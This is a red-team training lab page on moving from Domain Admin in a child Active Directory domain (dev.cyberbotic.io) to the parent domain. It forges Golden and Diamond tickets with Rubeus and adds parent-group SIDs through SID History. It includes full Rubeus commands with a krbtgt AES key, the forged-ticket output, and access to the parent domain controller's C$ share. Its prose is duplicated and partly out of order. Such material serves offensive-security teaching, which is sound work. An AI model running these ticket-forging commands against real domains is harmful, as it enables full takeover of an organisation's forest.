Parent/Child | What is this changing

Last updated 4 days ago

When a child domain is added to a forest, it automatically creates a transitive, two-way trust with its parent. This can be found in the lab where dev.cyberbotic.io is a child domain of cyberbotic.io.

SourceName is the current domain, TargetName is the foreign domain, TrustDirection is the trust direction (bidirectional is two-way), and TrustAttributes: WITHIN_FOREST lets us know that both of these domains are part of the same forest which implies a parent/child relationship.

If we have Domain Admin privileges in the child, we can also gain Domain Admin privileges in the parent using a TGT with a special attribute called SID History. SID History was designed to support migration scenarios, where a user would be moved from one domain to another. To preserve access to resources in the "old" domain, the user's previous SID would be added to the SID History of their new account. When creating such a ticket, the SID of a privileged group (EAs, DAs, etc) in the parent domain can be added that will grant access to all resources in the parent.

This can be achieved using either a Golden or Diamond Ticket.

Golden Ticket

The process is the same as creating Golden Tickets previously, the only additional information required is the SID of a target group in the parent domain.

Create the golden ticket with Rubeus.

Then import it into a logon session and use it to access the domain controller in the parent.

Diamond Ticket

The Rubeus diamond command also has a /sids parameter, with which we can supply the extra SIDs we want in our ticket.

If dev.cyberbotic.io also had a child (e.g. test.dev.cyberbotic.io), then a DA in TEST would be able to use their krbtgt to hop to DA/EA in cyberbotic.io instantly because the trusts are transitive.

There are also other means which do not require DA in the child. For example, you can also kerberoast and ASREProast across domain trusts, which may lead to privileged credential disclosure. Because principals in CYBER can be granted access to resources in DEV, you may find instances where they are accessing machines we have compromised. If they interact with a machine with unconstrained delegation, we can capture their TGTs. If they're on a machine interactively, such as RDP, we can impersonate them just like any other user.

Last updated 4 days ago

This can be achieved using either a Golden or Diamond Ticket.

Golden Ticket

The process is the same as creating Golden Tickets previously, the only additional information required is the SID of a target group in the parent domain.

beacon> powershell Get-DomainGroup -Identity "Domain Admins" -Domain cyberbotic.io -Properties ObjectSid

objectsid                                   
---------                                   
S-1-5-21-2594061375-675613155-814674916-512

beacon> powershell Get-DomainController -Domain cyberbotic.io | select Name

Name              
----              
dc-1.cyberbotic.io

Create the golden ticket with Rubeus.

PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /sids:S-1-5-21-2594061375-675613155-814674916-512 /nowrap

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : DEV.CYBERBOTIC.IO (DEV)
[*] SID            : S-1-5-21-569305411-121244042-2357301523
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ExtraSIDs      : S-1-5-21-2594061375-675613155-814674916-512
[*] ServiceKey     : 51D7F328ADE26E9F785FD7EEE191265EBC87C01A4790A7F38FB52E06563D4E7E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : 51D7F328ADE26E9F785FD7EEE191265EBC87C01A4790A7F38FB52E06563D4E7E
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : krbtgt
[*] Target         : dev.cyberbotic.io

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@dev.cyberbotic.io'

[*] AuthTime       : 9/12/2022 10:44:21 AM
[*] StartTime      : 9/12/2022 10:44:21 AM
[*] EndTime        : 9/12/2022 8:44:21 PM
[*] RenewTill      : 9/19/2022 10:44:21 AM

[*] base64(ticket.kirbi):

      doIFmD[...]MuaW8=

Then import it into a logon session and use it to access the domain controller in the parent.

beacon> run klist

Current LogonId is 0:0x3a6665

Cached Tickets: (1)

#0>	Client: Administrator @ DEV.CYBERBOTIC.IO
	Server: krbtgt/dev.cyberbotic.io @ DEV.CYBERBOTIC.IO
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96

beacon> ls \\dc-1.cyberbotic.io\c$

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/15/2022 15:26:54   $Recycle.Bin
          dir     08/10/2022 04:55:17   $WinREAgent
          dir     08/10/2022 05:05:53   Boot
          dir     08/18/2021 23:34:55   Documents and Settings
          dir     08/19/2021 06:24:49   EFI
          dir     05/08/2021 08:20:24   PerfLogs
          dir     08/24/2022 11:11:21   Program Files
          dir     08/10/2022 04:06:16   Program Files (x86)
          dir     09/08/2022 17:33:33   ProgramData
          dir     08/15/2022 15:07:48   Recovery
          dir     08/24/2022 11:05:32   Shares
          dir     08/31/2022 16:44:18   System Volume Information
          dir     08/15/2022 15:09:04   Users
          dir     08/24/2022 11:10:45   Windows
 427kb    fil     08/10/2022 05:00:07   bootmgr
 1b       fil     05/08/2021 08:14:33   BOOTNXT
 12kb     fil     09/12/2022 08:36:09   DumpStack.log.tmp
 384mb    fil     09/12/2022 08:36:09   pagefile.sys

Diamond Ticket

The Rubeus diamond command also has a /sids parameter, with which we can supply the extra SIDs we want in our ticket.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:519 /sids:S-1-5-21-2594061375-675613155-814674916-519 /krbkey:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /nowrap

[*] Action: Diamond Ticket

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc-2.dev.cyberbotic.io'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: KT+juea5lxCbxNfLLWbgRorvmR+gRkaoifHatrHE0GE=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

      doIF1j[...]5JTw==

[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT

[*] base64(ticket.kirbi):

      doIGAj[...]lDLklP

If dev.cyberbotic.io also had a child (e.g. test.dev.cyberbotic.io), then a DA in TEST would be able to use their krbtgt to hop to DA/EA in cyberbotic.io instantly because the trusts are transitive.

beacon> getuid
[*] You are DEV\bfarmer

beacon> powershell Get-DomainTrust

SourceName      : dev.cyberbotic.io
TargetName      : cyberbotic.io
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 8/15/2022 4:00:00 PM
WhenChanged     : 8/15/2022 4:00:00 PM